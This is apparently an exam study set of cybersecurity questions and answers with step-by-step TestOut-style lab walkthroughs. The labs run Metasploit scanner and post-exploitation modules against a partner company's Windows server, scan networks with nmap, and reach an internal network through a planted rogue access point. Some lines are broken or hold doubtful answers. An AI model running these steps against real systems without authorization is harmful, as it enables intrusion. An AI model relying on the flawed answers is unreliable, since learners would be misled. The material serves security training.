Which vulnerability life cycle step is BEST described as the phase in which a security analyst determines whether all the previous phases are effectively employed?
Verification
While looking at user logs you notice a user has been accessing items they should not have rights to. After speaking to the user, you believe your system may have experienced an attack. Which type of attack has the system MOST likely experienced?
Vertical privilege escalation
The following command and output were performed against a new web server prior to deploying it to production. Which type of security process identifies security weaknesses in an organization's infrastructure that might result in the output below?
Vulnerability assessment
Which method involves considering all an incident's details and taking action to keep the incident from happening again.
Vulnerability mitigation
During which phase of the Kill Chain framework is malware code encapsulated into commonly used file formats, such as PDF files, image files, or Word documents?
Weaponization
What information is included in the service portion of a due diligence assessment? (Select two.)
What level of system access does the vendor require? Does the vendor provide reliable and timely product support?
You are monitoring your network's traffic, looking for signs of strange activity. After looking at the logs, you see that there was a recent spike in database read volume. Could this be a problem and why?
Yes. A spike in database read volume can show that a hacker has downloaded a great deal of information from the database.
You are looking through your network usage logs and notice logins from a variety of geographic locations that are far from where your employees usually log in. Could this be a problem and why?
Yes. Logins from strange geographical locations can show that a hacker is trying to gain access from a remote location.
You are testing a new application using a combination of known and unknown testing. How would you BEST describe this approach?
You are engaging in partially known testing.
How can the Wireshark tool help you with digital forensics?
You can use it to analyze packets to search for evidence.
Your network has been subject to a variety of network attacks and you are currently monitoring the user logs for suspicious activity, yet further attacks are still occurring. Which additional step could you take to increase network security?
You could regularly scan your system for vulnerabilities.
You are the security analyst for your organization. During a vulnerability analysis, you have discovered what looks to be malware, but it does not match any signatures or identifiable patterns. Which of the following BEST describes the threat you have discovered?
Zero-day
As you perform an audit of your company's DNS servers, you notice from an external third-party DNS source that the following information is visible. You know the servers listed are internal only and should not be visible in a domain query. What is it called when internal DNS server information is available outside of a company's network?
Zone transfer
A password spraying attack is MOST like which of the following attack types?
a brute force attack
Which set of tools is often used to intercept the four-way handshake?
aircrack-ng
Which technology causes a transistor in the chip to blow if the chip's firmware is altered?
eFuse
Which Windows command line tool can be used to show and modify a file's permissions?
icacls
A(n) ______ threat comes from a disgruntled employee or contractor.
internal
Which of the following is a valuable resource for security analysts to find out what the newly discovered Trojan and malware risks are?
it-isac.org
You are the security analyst for a small corporate network. You are concerned that several employees may still be using the unsecured FTP protocol against company policy. You have been capturing data for a while using Wireshark and are now examining the filtered FTP results. You see that several employees are still using FTP. Which user account used the password of lsie*$11?
jsmith
When scanning a Linux machine for running applications, you see the following output. Which kill signal should you use to clean up the offending process?
kill -9
A Windows machine in your office has been sending and receiving more traffic than usual, and a user is complaining that it has a slow connection. Your manager would like statistics on all protocol traffic to and from that machine over Ethernet. The netstat command can do that, but you need to know the switch that will give an output similar to what is shown below. Which command and options should you use?
netstat -e -s
Which command was invoked to start PID 3825 in the output below in conjunction with the ps aux command?
python
A(n) ______ assessment measures valuation and intangibles.
qualitative
A(n) ______ assessment measures the direct value of tangible assets.
quantitative
There is strong evidence that a machine is compromised on your company network, but you have not determined which computer. You are going to try to pinpoint the host by scanning for any network devices that are in promiscuous mode. Which of the following Nmap scripts would you use?
sniffer-detect
Which command is used to allow a string to be copied in the code, but can be exploited to carry out overflow attacks?
strcpy
You have been tasked with securing a Linux box that the development team needs occasional FTP access to. The developers should start the vsftpd daemon as needed and then stop it when finished with their task. To help prevent the vsftpd service from running unintentionally, you run the following command and receive the output listed. What command should you run to prevent the service from starting when the Linux machine boots?
systemctl disable vsftpd
What is the name for a mock attack exercise that simulates an actual network attack?
tabletop
You are reviewing packets captured by a co-worker. The traffic is from a Linux server that hosts private customer data, and your job is to analyze the content for potential security risks. The .pcap file appears to be a bit small for what you wanted. (It contains traffic to and from the target system during a given time period.) Some of that traffic is shown below. You suspect that only SSH traffic is represented in this capture, which was done with tcpdump. What command do you think your co-worker used to capture only SSH traffic?
tcpdump port 22
As a security consultant, you have been tasked with checking what company data is currently visible to the public. Using theHarvester tool, you query for information and receive too much information coming from too many sources. The following image represents your query. Which of the commands below limits the number of results to 750 and only queries Google?
theHarvester -d rmksupplies.com -l 750 -b google
As part of setting up a Windows machine to send log events to a remote host, you have executed the winrm qc command and answered the questions as shown below. Which command would you run on the collector host from an elevated Command Prompt?
wecutil qc
A member of which team is often used to oversee a tabletop exercise?
white
Which EAP protocol provides authentication using a protected access credential?
EAP-FAST
You are the security analyst for a small corporate network. Your manager has received several concerning emails. He has asked you to view his email and determine whether these messages are hazardous or safe. In this lab, your task is to: Read each email and determine whether the email is legitimate. Delete any emails that are attempts at social engineering. Keep all emails that are safe.
EMAILS TO DELETE - Microsoft Windows Update CenterNew Service Pack - Jim HawsRe: Lunch Today? - Executive RecruitingExecutive Jobs - Riverdale Estates HOAPayment Pending - Grandma WhiteFW: FW: FW: Virus Attack Warning - Daisy KnudsenWeb Site Update - Rachelle HancockWow!! - Grandma WhiteFree Airline Tickets
A hacker wants to leverage social media to glean information coming from a certain location. Which tool is BEST suited for the job?
Echosec
Compliments, misinformation, feigning ignorance, and being a good listener are tactics of which social engineering technique?
Elictitation
What is the primary purpose of eradication?
Eliminate all traces of an incident while carefully preserving evidence that may be used in a criminal investigation.
Which of the following is an advantage of setting up a federation?
Employees have easier onboarding.
You have been hired by an organization that has been victimized by session hijacking. What is one of the most important steps you as a security analyst can take to prevent further session hijacking attacks?
Encrypt network traffic.
Which of the following is an example of IAM?
Entering a PIN
What is the philosophy behind DevSecOps?
Everyone on the development team should be responsible for security.
Which Wi-Fi attack uses a rogue access point configured with the same SSID as the organization's SSID?
Evil twin
What information will be returned from the following google search?
Excel documents with the word "password" in the title, but not from .gov and .gov.uk websites.
Which items are included in an acceptable use policy? (Select two.)
Expectations for user privacy when using company resources How information and network resources should be used
Which of the following validations require an extensive verification process, shows a padlock, business name, and country code?
Extended
Which processor chip can be configured by the end user to perform the tasks he or she needs it to?
FPGA
Which of the following firewall identification methods uses a TCP packet with a TTL value set to expire one hop past the firewall?
Firewalking
A security analyst is testing to find SQL injection vulnerabilities. She uses automation of a large volume of random data inserted into the web application's input fields in order to check the output. Which type of testing was done?
Fuzz testing
Which of the following is a popular honeypot that can be used to create thousands of other honeypots?
Honeyd
Which of the following is a device used by the blue team to lure an unsuspecting attacker to aimlessly explore?
Honeypot
Which of the following should be designed to look and function like a real resource in order attract attackers?
Honeypot
What is the name of a computer on which a hypervisor runs to provide one or more virtual machines?
Host
A single end user at your company is complaining of login failures to an internal-only website that is used daily by many employees. When you access the machine to visit the remote site, you see that the URL for the requested website is changed to an IP address that appears to be in Cambodia and is 57.72.80.14. What would be the simplest type of DNS attack that the user could be experiencing in this scenario?
Host file manipulation
What do partial, risk-informed, repeatable, and adaptive achievements indicate?
How core functions align with an organization's risk management procedures
Each user on a network must have a unique digital identity. Which of the following is this known as?
Identity and access management (IAM)
One common setting on electronic tablets is a feature that erases all data if the password or passcode is entered incorrectly too many times. This can be a very good thing for corporate devices or devices that contain company data. What is a logical reason that this setting could be a bad idea in certain situations?
If a user doesn't know about the policy, is inattentive, or a child gets the device and enters the passcode incorrectly, important data could be lost.
Which of the following is true regarding containerization?
If an attacker gains access to the operating system, they will have access to all containers.
What should you do with email from unknown or unverified user accounts?
Ignore the email.
Downtime, penalties, and damage to assets are incident consequences with which type of impact?
Immediate impact
Your company has had a problem with users getting hacked even though you have established strong password policies. What is the next logical step to increase your company's security?
Implement two or more methods of authentication.
Which of the following BEST describes system logs?
Indicate logins with escalated privileges.
Hackers use social networking, dumpster diving, social engineering, and web surfing during which portion of their reconnaissance?
Information gathering techniques
What is a likely motivation for DoS and DDoS attacks?
Injury of the target's reputation
Which of the following is a good way to prevent privilege escalation attacks?
Limit privileges.
Which of the following honeypot interaction levels simulates a real OS, its applications, and its services?
Medium
Which of the following Windows permissions apply to local files and directories?
NTFS
Including a legitimate-looking embedded link to a malicious site in an email purporting to be from a legitimate source is which of the following types of cyberattack?
Phishing
You are tasked with changing the certificate authority to require that all requests be placed in the pending state until processed by an administrator. You have started certsrv (the certificate authority console) and are looking at the certificate authority's properties. Which tab would you select to change the way certificate requests are handled?
Policy Module
During which phase of the incident response life cycle do you hold meetings to discuss lessons learned from the incident and the response?
Post-incident activities
Which phase includes taking the recommendations that can be put into action through security implementations, policies, and procedures?
Post-incident feedback
Which of the following BEST describes the process of verifying that a device meets the minimum health requirements?
Posture assessment
The annual loss expectancy (ALE) calculation provides an organization's stakeholders with what information?
Potential financial loss of an event based on how often a threat could occur.
During which phase of the incident response life cycle do you reinforce your systems, policies, and procedures to ensure that your resources are well secured?
Preparation
Which of the following actions can help safeguard against data loss?
Routinely review access controls to ensure only needed access is given to each employee.
Which of the following needs to be configured so a firewall knows which traffic to allow or block?
Rules
Which of the following is true about rule-writing?
Rules could be as simple as looking for unsuccessful logins or could include more complex behavioral patterns.
A retail company is getting complaints from customers about how long product pages are taking to load, which is causing a decline in sales. Which of the following actions should you take first to discover the source of the problem?
Run a network bandwidth test on the company's network to determine if there are any anomalies.
Drag the vulnerability to the appropriate mitigation technique.
Run all processes using the least privileged account. Use secure web permissions and access control mechanisms. Unused User Accounts and Services orrect answer:Disable the directory listing option and remove the ability to load non-web files from a URL. File and Directory Management Use scripts and systems to compare file hash values with the master value to detect possible changes. Website Changes Remove user input fields when possible. HTTP Response Splitting Attacks
Tom, a security analyst, is notified by Karen, an employee, that her work iPad has some setting changes and a new app that she didn't download. What is the first step Tom should take?
Run an antivirus software scan on Karen's device and scan the entire network.
Which of the following allows users to sign into a single trusted account, such as Google or Facebook?
SSO
Which of the following is a fixed-sized bit array that has random data added to each plaintext hash?
Salted hashesP>
A coworker has run Scout Suite against your Microsoft Azure environment. What were they looking for?
Scout Suite is used to show potential security risks on cloud deployments.
Which of the following BEST describes how using scripts is different from running regular code?
Scripts are usually interpreted instead of compiled.
Which of the following is an open-source intrusion detection system that provides search and analysis tools to help index collected data?
Security Onion
Which of the following is a best practice for implementing security patches?
Security patches should be tested and implemented in a sandbox before being applied to all active systems.
A person in a dark grey hoodie has jumped the fence at your research center. A security guard has detained this person, denying them physical access. Which of the following areas of physical security is the security guard currently in?
Security sequence
Which security function identifies and evaluates threats in hopes of reducing their impact?
Risk management
Brandon is helping Fred with his computer. He needs Fred to enter his username and password into the system. Fred enters the username and password while Brandon is watching him. Brandon explains to Fred that it is not a good idea to allow anyone to watch you type in usernames or passwords. Which type of social engineering attack is Fred referring to?
Shoulder surfing
During a tabletop exercise, someone from the red team has a question about a procedure's validity and whether or not it would violate the terms of engagement. How should this be determined?
The white team must answer the question before moving forward.
An organization's cybersecurity staff needs to be competent at their jobs or serious consequences can occur. Which of the following is an important component to staying up to date and honing a team's cybersecurity skills?
Training
A resentful employee hacks into a company's website and replaces all the text and images with obscene material. They also replace all links with malicious ones. This is an example of which of the following?
Vandalism
Kjell is a security analyst and needs to see if any sensitive information is available through old website snapshots. Which tool is BEST suited for this purpose?
Wayback Machine
During which phase of the Kill Chain framework does an intruder extract or destroy data?
Action on Objectives
A security analyst and their team go through the entire list of assets in the company and assign each item a level of priority. Then they group the assets in the same levels together so they can create defense strategies for each group. What is this process called?
Bundling critical assets
Which type of testing is typically done by an internal tester who has full knowledge of the network, computer system, and infrastructure?
Known
When performing an authorized security audit of a website, you are given only the website address and asked to find other hosts on that network that might be vulnerable to attack. Which of the following tools might be used to lead you to the following Nmap output? (Select two.)
whois.org nslookup
An organization's user data server is backed up daily. Referencing the CIA triad, this is an example of which of the following?
Availability
Which team is responsible for defending the network against attacks in a risk training scenario?
Blue
Robyn, a new employee, needs to choose a password to log into the system. She doesn't want to forget it, but she needs to meet certain criteria required by security. What should she do?
Choose a password that's easy to remember but doesn't include any personal information.
Restoring data from backup is an example of which type of security control?
Compensating
A speaker was invited to a company-wide training meeting. When he arrived, he identified himself at the front desk, and the receptionist gave him directions on how to find the conference room. What important step did the receptionist miss?
Escorting him to the conference room
A tabletop exercise is a theoretical exercise where each team is given a set of criteria and then left to evaluate and strategize. They evaluate the what, when, where, why, and how. What is the purpose of this exercise?
It gives each team the opportunity to hone their skills and evaluate different techniques for attack and defense.
What seven-phase framework did Lockheed Martin develop to identify an attacker's step-by-step attack process?
Kill Chain
Which framework includes the Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, and Actions on Objectives phases?
Kill Chain
Which of the following BEST describes a physical barrier used to deter an aggressive intruder?
Large flowerpots
While reviewing video files from your organization's security cameras, you notice a suspicious person using piggybacking to gain access to your building. The individual in question did not have a security badge. Which of the following would you most likely implement to keep this from happening in the future?
Mantraps
Which of the following are tactics social engineers might use?
Moral obligation, ignorance, and threatening
Which type of framework is fairly rigid and requires that specific controls be implemented?
Prescriptive
Natural disasters can happen at any time and have unknown or incalculable effects. Based on information from subject matter experts, the probability of a natural disaster is once every 75 years. Using this information, what is the annualized rate of occurrence (ARO) for a natural disaster affecting an organization?
0.013
Which of the following are true about threats and vulnerabilities? (Select two.)
A threat is a potential source of harm. A vulnerability is an opening for an attacker to exploit.
Sophisticated attacks executed by highly skilled hackers with a specific target or objective in mind are classified as which type of threat?
Advanced persistent threat
Which threat modeling component identifies potential threat sources, what these adversaries can do, and how likely these attacks are?
Adversary capability analysis
Which threat modeling measurement is used to describe how an attack can exploit a vulnerability?
Attack vector
There are five phases in the security intelligence life cycle. During which phase do you gather and process information from your internal sources, such as system and application logs?
Collection
Threats are usually ranked from high to low. A higher number indicates a dangerous threat. A lower number indicates threats that may be annoyances but aren't necessarily malicious in nature. What is this high-to-low scale known as?
Confidence level
Access to a database is protected by multi-factor authentication. In the CIA triad, this is an example of which of the following?
Confidentiality
What do each of the letters represent in the CIA triad? (Select three.)
Confidentiality Integrity Availability
A new piece of equipment is placed into production. It is connected and powered on. Which of the following is the known threat vulnerability introduced in this scenario?
Default credentials
Ron, a hacker, wants to gain access to a prestigious law firm he has been watching for a while. June, an administrative assistant at the law firm, is having lunch at the food court around the corner from her office. Ron notices that June has a picture of a dog on her phone. He casually walks by and starts a conversation about dogs. Which phase of the social engineering process is Ron in?
Development phase
As a security technician who is in charge of physical security for computer and network resources, you are responsible for ensuring a quick recovery should an event occur. A physical storage device controlling data backups has failed, causing corruption for a weekly full backup. It failed on Saturday. On Monday, you noticed the errors and have since run a restore of needed data and a full backup to ensure continuity. The failed device has been replaced. Since each work day creates unique data to be backed up, which type of backup would be the preferred method to make certain each day's data was properly maintained while ensuring efficiency? (The time required for backup is not a primary concern, but the time needed to restore data is, as is backup data storage space.)
Differential backup
You are in the process of implementing policies and procedures that require employee identification. You observe employees holding a secure door for others to pass through. Which of the following training sessions should you implement to help prevent this in the future?
How to prevent piggybacking and tailgating.
Which information type is a hacker working with when they gather geographical information, entry control points, and employee routines?
Physical security
COBIT, ITIL, and ISO are examples of which type of framework?
Prescriptive
Important aspects of physical security include which of the following?
Preventing interruptions of computer services caused by problems such as fire
What are the three factors to keep in mind with physical security?
Prevention, detection, and recovery
Which of the following BEST describes what asset criticality does?
Prioritizes systems for scanning and remediation
When determining a risk's severity, which of the following are best to consider? (Select two.)
Probabilty Magnitude
Which team is responsible for trying to infiltrate and attack a network?
Red
Attackers often target data and intangible assets. Identify what hackers may do with the information they collect. (Select two.)
Sell the data to the competition Harm a company's reputation
Miguel has been practicing his hacking skills. He has discovered a vulnerability on a system that he did not have permission to attack. Once Miguel discovered the vulnerability, he anonymously alerted the owner and instructed them on how to secure the system. Which type of hacker is Miguel in this scenario?
Semi-authorized
Which BEST defines the term base in CVSS?
A vulnerability's unique characteristics
When a host initiates a connection to a server via the TCP Protocol, a three-way handshake is used. What is the host's final reply?
ACK
Who maintains the Android source code?
AOSP
Which of the following BEST describes workflow orchestration?
A collection of tasks that are performed in a logical sequence as efficiently as possible.
Which frequency does ZigBee operate at?
2.4 GHz
You are the security analyst for a small corporate network. You are currently using pfSense as your security appliance. In this lab, your task is to: Change the password for the default pfSense account from pfsense to Donttre@donme. Create a new administrative user with the following parameters:Username: lyoungPassword: C@nyouGuess!tFull Name: Liam YoungGroup Membership: admins Set a session timeout of 20 minutes for pfSense. Disable the webConfigurator anti-lockout rule for HTTP.
1. Access the pfSense management console. a. From the taskbar, select Google Chrome. b. Maximize the window for better viewing. c. In the Google Chrome address bar, enter 198.28.56.22 and then press Enter. d. Enter the pfSense sign-in information as follows: § Username: admin § Password: pfsense e. Select SIGN IN. 2. Change the password for the default (admin) account. a. From the pfSense menu bar, select System > User Manager. b. For the admin account, under Actions, select the Edit user icon (pencil). c. For the Password field, change to Donttre@donme. d. For the Confirm Password field, enter Donttre@donme. e. Scroll to the bottom and select Save. 3. Create and configure a new pfSense user. a. Select Add. b. For Username, enter lyoung. c. For the Password field, enter C@nyouGuess!t. d. For the Confirm Password field, enter C@nyouGuess!t. e. For Full Name, enter Liam Young. f. For Group Membership, select admins and then select Move to Member of list. g. Scroll to the bottom and select Save. 4. Set a session timeout for pfSense. a. Under the System breadcrumb, select Settings. b. For Session timeout, enter 20. c. Select Save. 5. Disable the webConfigurator anti-lockout rule for HTTP. a. From the pfSense menu bar, select System > Advanced. b. Under webConfigurator, for Protocol, select HTTP. c. Select Anti-lockout to disable the webConfigurator anti-lockout rule. d. Scroll to the bottom and select Save.
You are the security analyst for a small corporate network. To increase security for the corporate network, you have installed the pfSense network security appliance on your network. Using pfSense, you now need to configure DNS and a default gateway. In this lab, your task is to: Sign in to pfSense using the following case-sensitive information:URL: 198.28.56.22Username: adminPassword: pfsense Configure the DNS servers as follows:Primary DNS server: 163.128.78.93 - Hostname: DNS1Secondary DNS server: 163.128.80.93 - Hostname: DNS2 Configure the WAN IPv4 information as follows:Enable the interface.Use a static IPv4 address of 65.86.24.136/8Add a new gateway using the following information:Type: Default gatewayName: WANGatewayIP address: 65.86.1.1
1. Access the pfSense management console. a. From the taskbar, select Google Chrome. b. Maximize the window for better viewing. c. In the address bar, type 198.28.56.22 and then press Enter. d. Sign in using the following case-sensitive information: § Username: admin § Password: pfsense e. Select SIGN IN or press Enter. 2. Configure the DNS Servers. a. From the pfSense menu bar, select System > General Setup. b. Under DNS Server Settings, configure the primary DNS server as follows: § Address: 163.128.78.93 § Hostname: DNS1 § Gateway: None c. Select Add DNS Server to add a secondary DNS server and then configure it as follows: § Address: 163.128.80.93 § Hostname: DNS2 § Gateway: None d. Scroll to the bottom and select Save. 3. Configure the WAN settings. a. From pfSense menu bar, select Interfaces > WAN. b. Under General Configuration, select Enable interface. c. Use the IPv4 Configuration Type drop-down to select Static IPv4. d. Under Static IPv4 Configuration, in the IPv4 Address field, enter 65.86.24.136. e. Use the IPv4 Address subnet drop-down to select 8. f. Under Static IPv4 Configuration, select Add a new gateway. g. Configure the gateway settings as follows: § Default: Select Default gateway § Gateway name: Enter WANGateway § Gateway IPv4: 65.86.1.1 h. Select Add. i. Scroll to the bottom and select Save. j. Select Apply Changes.
Listen to simulation instructions You are the security analyst for a small corporate network. You recognize that the threat of malware is increasing, and you have implemented Windows Security on the office computers. In this lab, your task is to configure Windows Security as follows: Add a file exclusion for D:\Graphics\book.jpg. Add a process exclusion for files associated with your corporate software (corp_process.exe). Check for virus and threat updates. Perform a quick scan.
1. Add a file exclusion. a. In the search field on the taskbar, type Windows Security. b. Under Best match, select Windows Security. c. Maximize the window for better viewing. d. Select Virus & threat protection. e. Under Virus & threat protection settings, select Manage settings. f. Under Exclusions, select Add or remove exclusions. g. Select + Add an exclusion. h. From the drop-down lists, select File. i. Under This PC, select Data (D:). j. Double-click Graphics. k. Select book.jpg. l. Select Open. 2. Add a process exclusion. a. Select + Add an exclusion. b. From the drop-down lists, select Process. c. In the Enter process name field, enter corp_process.exe for the process name. d. Select Add. 3. Update protection definitions. a. In the left menu, select the shield (Virus & threat protection) icon. b. Under Virus & threat protection updates, select Check for updates. c. Under Security Intelligence updates, select Check for updates. 4. Perform a quick scan. a. In the left menu, select the shield icon. b. Under Current threats, select Quick scan to run a quick scan now.
Listen to simulation instructions You are the security analyst for a small corporate network. Your boss is concerned that her computer (Exec) contains sensitive company information. To prevent this information from being stolen, you have decided to encrypt the drive using BitLocker. The Exec computer has a built-in TPM on the motherboard. In this lab, your task is to configure BitLocker drive encryption as follows: Try to turn on BitLocker for the System (C:) drive. Answer the question. From the BIOS settings, turn on and activate TPM. Turn on BitLocker for the System (C:) drive. Save the recovery key to \\CorpServer\BU-Exec. Encrypt the entire System (C:) drive. Run the BitLocker system check.
1. Attempt to enable BitLocker. a. In the search field on the taskbar, enter Bitlock. b. Under Best match, select Manage BitLocker. c. Under Operating system drive, select Turn on BitLocker. d. In the top right, select Answer Questions. e. Answer Question 1 and then minimize the question dialog. f. Select Cancel. 2. Access Exec's BIOS settings. a. From the taskbar, right-click Start and then select Shut down or sign out > Restart. b. When the TestOut logo appears, press Delete to enter the BIOS. 3. Turn on and activate TPM. a. From the left pane, expand Security. b. Select TPM Security. c. From the right pane, select TPM Security to turn TPM security on. d. Select Apply. e. Select Activate. f. Select Apply. g. Select Exit.Windows is restarted and you are signed in. 4. Turn on BitLocker. a. After Exec finishes rebooting, in the search field on the taskbar, enter Bitlock. b. Under Best match, select Manage BitLocker. c. Under Operating system drive, select Turn on BitLocker.Windows is now able to begin the Drive Encryption setup. 5. Save the recovery key to \\CorpServer\BU-Exec. a. Select Save to a file to back up your recovery key to a file. b. Browse the network to \\CorpServer\BU-Exec. c. Select Save. d. After your recovery key is saved, select Next. 6. Choose how much of your drive to encrypt and verify that the drive is encrypted. a. Select Encrypt entire drive and then click Next. b. Leave the default setting selected when choosing the encryption mode and click Next. c. Select Run BitLocker system check and then click Continue. d. Select Restart now. e. When the encryption process is complete, select Close. 7. Verify that System (C:) is being encrypted. a. From the taskbar, open File Explorer. b. From the left pane, select This PC. c. From the right pane, verify that the System (C:) drive shows the lock icon. d. In the top right, select Answer Questions. e. Select Score Lab. f. Windows indicates that a TPM was not found.
You are the security analyst for your company. Your friend at a partner company asked you to scan his company's public-facing servers to see if they have any obvious vulnerabilities. The PartnerCorp servers are on the 73.44.216.0 network. In this lab, your task is to: Perform a scan using the following information:Network address: 73.44.216.0Subnet mask: Class C Answer the questions.
1. Scan the PartnerCorp servers for vulnerabilities. a. From the Favorites bar, select Zenmap. b. At the prompt, type nmap 73.44.216.0/24. c. Select Scan. 2. Find the network vulnerabilities in the output and then answer the questions. a. In the top right, select Answer Questions. b. Answer the questions. c. Select Score Lab. 1- Yes 2- telnet
You are the security analyst for a small corporate network. You want to find specific information about the packets being exchanged on your network using Wireshark. In this lab, your task is to: Use Wireshark to capture packets from the enp2s0 interface. Use a Wireshark filter to isolate and examine packets for:All network traffic for 192.168.0.0All traffic for the 192.168.0.45 hostAll IP traffic with a source address of 192.168.0.45All IP traffic with a destination address of 192.168.0.45All HTTP traffic on port 80All packets with an Ethernet Mac address containing 11:12:13All TCP packets that contain the word "password" Answer the questions.
1. Begin a Wireshark capture. a. From the Favorites bar, select Wireshark. b. Maximize the window for easier viewing. c. Under Capture, select enp2s0. d. Select the blue fin to begin a Wireshark capture. 2. Apply the net 192.168.0.0 filter. a. In the Apply a display filter field, type net 192.168.0.0 and press Enter.Look at the source and destination addresses of the filtered packets. b. Select the red square to stop the Wireshark capture. c. In the top right, select Answer Questions. d. Answer Question 1. 3. Apply the host 192.168.0.45 filter. a. Select the blue fin to begin a Wireshark capture. b. In the Apply a display filter field, type host 192.168.0.45 and press Enter.Look at the source and destination addresses of the filtered packets. c. Answer Question 2. 4. Apply the ip.src==192.168.0.45 filter. a. In the Apply a display filter field, type ip.src==192.168.0.45 and press Enter.Look at the source and destination addresses of the filtered packets. b. Answer Question 3. 5. Apply the ip.dst==192.168.0.45 filter. a. In the Apply a display filter field, type ip.dst==192.168.0.45 and press Enter.Look at the source and destination addresses of the filtered packets. b. Answer Question 4. 6. Apply the tcp.port==80 filter. a. In the Apply a display filter field, type tcp.port==80 and press Enter.Look at the source and destination addresses of the filtered packets. b. Answer Question 5. 7. Apply the eth contains 11:12:13 filter. a. In the Apply a display filter field, type eth contains 11:12:13 and press Enter.Look at the source and destination addresses of the filtered packets. b. Answer Question 6. 8. Apply the tcp contains password filter. a. In the Apply a display filter field, type tcp contains password and press Enter. b. Select the red box to stop the Wireshark capture. c. Locate the password. d. Answer Question 7. e. Select Score Lab. 1- Only packets with either a source or destination address on the 192.168.0.x network are displayed. 2- Only packets with 192.168.0.45 in either the source or destination address are displayed. 3- Only packets with 192.168.0.45 in the source address are displayed. 4- Only packets with 192.168.0.45 in the destination address are displayed. 5- Only packets with port 80 in either the source or destination port are displayed. 6- Only packets with 11:12:13 in either the source or destination MAC address are displayed. 7- hippophobia
You are the security analyst working for CorpNet. PartnerCorp wants to protect against any potential weakness in their public-facing servers. While doing some testing, you have discovered one of their Windows servers named partnercorp_www3.partnercorp.xyz with an IP address of 73.44.215.3. You believe a Microsoft SQL server is installed on this server, but it doesn't respond to the default TCP port of 1433. In this lab, your task is to: Use the auxiliary/scanner/mssql/mssql_ping exploit in Metasploit to determine which TCP port Microsoft SQL is using. Answer the question.
1. Configure Metasploit framework to use the MSSQL Ping Utility exploit. a. From the Favorites bar, select metasploit framework. b. At the prompt, type use auxiliary/scanner/mssql/mssql_ping and press Enter to use the MSSQL Ping Utility exploit. c. Type show options and press Enter to show the exploit options.Notice that the RHOSTS setting is absent. 2. Configure RHOST to the correct IP address. a. Type set RHOSTS 73.44.215.3 and press Enter to specify the remote host. b. Type show options and press Enter to show the exploit options.Notice that RHOSTS has been configured. 3. Execute the exploit and answer the question. a. Type exploit and press Enter to begin the exploit. b. In the top right, select Answer Questions. c. Answer the question. d. Select Score Lab. 1- 1533
You are the security analyst working for CorpNet. You are assisting PartnerCorp to defend against weaknesses in their public-facing servers. While doing some testing, you discover that from outside of the PartnerCorp network, you are able to deploy a Metasploit payload to one of their Windows servers named partnercorp_www3.partnercorp.xyz. You are determining whether the Windows patches are up to date or if there is an unpatched vulnerability that could be exploited. In this lab, your task is to: Use the post/windows/gather/enum_patches exploit in Metasploit to enumerate the Windows patches that are missing or vulnerable. Answer the question.
1. Configure Metasploit framework to use the enum_patches exploit. a. From the Favorites bar, select metasploit framework. b. At the prompt, type use post/windows/gather/enum_patches and then press Enter to use the enumerate patches exploit. c. Type show options and press Enter to show the exploit options.(Notice that the session option is absent.) 2. Set the session option. a. Type set session 1 and press Enter. b. Type show options and press Enter.(Notice that the session option has been set.) 3. Run the exploit and answer the question. a. Type run and press Enter to begin the exploit. b. In the top right, select Answer Questions. c. Answer the question. d. Select Score Lab. 1- KB2871997, KB2928120
You are the security analyst for a small corporate network. You have decided to test how secure the company's network would be if a rogue wireless access point was introduced. To do this, you have connected a small computer to the switch in the Networking Closet. This computer also functions as a rogue wireless access point. You are now sitting in your van in the parking lot of your company, where you are connected to the internal network through the rogue wireless access point. Using the small computer you left behind, you want to test running remote exploits against the company. In this lab, your task is to: Use ssh -X to connect to your rogue computer (192.168.0.251). Use 1worm4b8 as the root password. Use Zenmap on the remote computer to scan all the ports on the internal network and look for computers vulnerable to attack. Answer the questions.
1. Connect to the network using the rouge system. a. From the Favorites bar, select Terminal. b. At the prompt, type ssh -X 192.168.0.251 and press Enter. c. For the root password, type 1worm4b8 and press Enter.You are now connected to Rogue1. 2. Scan the network using Zenmap. a. Type zenmap and press Enter to launch Zenmap remotely.Zenmap is running on the remote computer, but you see the screen locally. b. In the Command field, type nmap -p- 192.168.0.0/24. c. Select Scan. 1- 192.168.0.15, 192.168.0.22 2- 192.168.0.10
You are the security analyst for a small corporate network. You previously configured the BranchVPN1 server as a remote access server to allow VPN connections. Members of the sales department connect to the server to upload their sales reports as they work from home or on the road. In this lab, your task is to create and configure a network policy to allow members of the sales department to remotely connect using the following parameters: Name the policy Sales. Use a remote access server. Connecting users/computers must belong to the Sales group. Deny access to any account that is not configured in Active Directory. Configure permissions to use settings in the Active Directory user accounts (User Dial-in properties). User account settings are configured by an Active Directory user account administrator. Use the secured password (EAP-MSCHAP v2). Configure a session timeout of 30 minutes. As a constraint, allow access only from 6:00 a.m. to 9:00 p.m., Monday-Friday. Make the policy first in the list of policies.
1. Create a remote access network policy named Sales. a. From Server Manager, select Tools > Network Policy Server. b. Maximize the window for better viewing. c. Expand Policies. d. Right-click Network Policies and then select New. e. In the Policy name field, enter Sales. f. From the Type of network access server drop-down list, select Remote Access Server (VPN-Dial up). g. Select Next. 2. Add a condition to the network policy. a. Select Add to add group membership as a condition. b. Select Windows Groups. c. Select Add. d. Select Add Groups. e. Under Enter the object names to select, enter Sales. f. Select OK. g. Select OK to close the Windows Groups dialog. h. Select Next. 3. Specify the access permissions. a. Select Access denied. b. Select Access is determined by User Dial-in properties. c. Select Next. 4. Configure the authentication methods. a. Under EAP Types, select Add. b. Select Microsoft: Secured password (EAP-MSCHAP v2) and then select OK. c. Under Less secure authentication methods, unmark all options. d. Select Next. 5. Configure a session timeout constraint. a. Under Constraints, select Session Timeout. b. Select Disconnect after the following maximum session time. c. Set the timeout session time to 30 minutes. 6. Configure a day and time restriction constraint. a. Under Constraints, select Day and Time restrictions. b. Select Allow access only on these days and at these times. c. Select Edit. d. Modify the settings to allow access only from 6:00 a.m. to 9:00 p.m., Monday-Friday. e. Select OK and then select Next. f. From the Configure Settings dialog (RADIUS Attributes), select Next. g. Select Finish. 7. Under Policy Name, make sure that the Sales policy is at the top of the list.
An attacker sends forged Address Resolution Protocol Reply packets over a LAN to a target machine. These packets include an IP address that matches the gateway's IP address but retains its own MAC address. The target machine then sends all traffic to the attacker's machine, believing it is the gateway. Which type of attack just happened?
ARP poisoning
